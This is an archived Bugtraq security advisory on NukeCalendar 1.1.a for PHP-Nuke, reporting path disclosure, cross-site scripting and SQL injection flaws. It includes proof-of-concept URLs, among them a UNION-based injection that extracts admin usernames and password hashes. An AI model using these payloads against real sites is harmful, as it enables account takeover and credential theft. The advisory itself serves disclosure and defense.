NukeCalendar Multiple Vulnerabilities
BID:10082
Info
NukeCalendar Multiple Vulnerabilities
| Bugtraq ID: | 10082 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 08 2004 12:00AM |
| Updated: | Apr 08 2004 12:00AM |
| Credit: | Discovery is credited to Janek Vind <[email protected]>. |
| Vulnerable: |
shiba-design NukeCalendar 1.1 .a |
| Not Vulnerable: | |
Discussion
NukeCalendar Multiple Vulnerabilities
NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities.
These issues include path disclosure, SQL injection and cross-site scripting. Possible consequences include disclosure of sensitive information and account/bulletin board compromise. Attacks against the database implementation itself are also possible through SQL injection.
NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities.
These issues include path disclosure, SQL injection and cross-site scripting. Possible consequences include disclosure of sensitive information and account/bulletin board compromise. Attacks against the database implementation itself are also possible through SQL injection.
Exploit / POC
NukeCalendar Multiple Vulnerabilities
The following proof-of-concept examples were provided:
(Path Disclosure)
http://www.example.com/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=foobar
http://www.example.com/nuke71/blocks/block-Calendar.php
http://www.example.com/nuke71/blocks/block-Calendar1.php
http://www.example.com/nuke71/blocks/block-Calendar_center.php
(Cross-site Scripting)
http://www.example.com/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=[xss code here]
(SQL Injection)
http://www.example.com/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=-1%20UNION%20select%20null,aid,null,pwd,null,null,null,null,null,null,null,null%20%20FR
+OM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
The following proof-of-concept examples were provided:
(Path Disclosure)
http://www.example.com/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=foobar
http://www.example.com/nuke71/blocks/block-Calendar.php
http://www.example.com/nuke71/blocks/block-Calendar1.php
http://www.example.com/nuke71/blocks/block-Calendar_center.php
(Cross-site Scripting)
http://www.example.com/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=[xss code here]
(SQL Injection)
http://www.example.com/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=-1%20UNION%20select%20null,aid,null,pwd,null,null,null,null,null,null,null,null%20%20FR
+OM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
Solution / Fix
NukeCalendar Multiple Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
NukeCalendar Multiple Vulnerabilities
References:
References:
- shiba-design Homepage (shiba-design)
- [waraxe-2004-SA#015 - Multiple vulnerabilities in NukeCalendar v1.1.a] (Janek Vind
)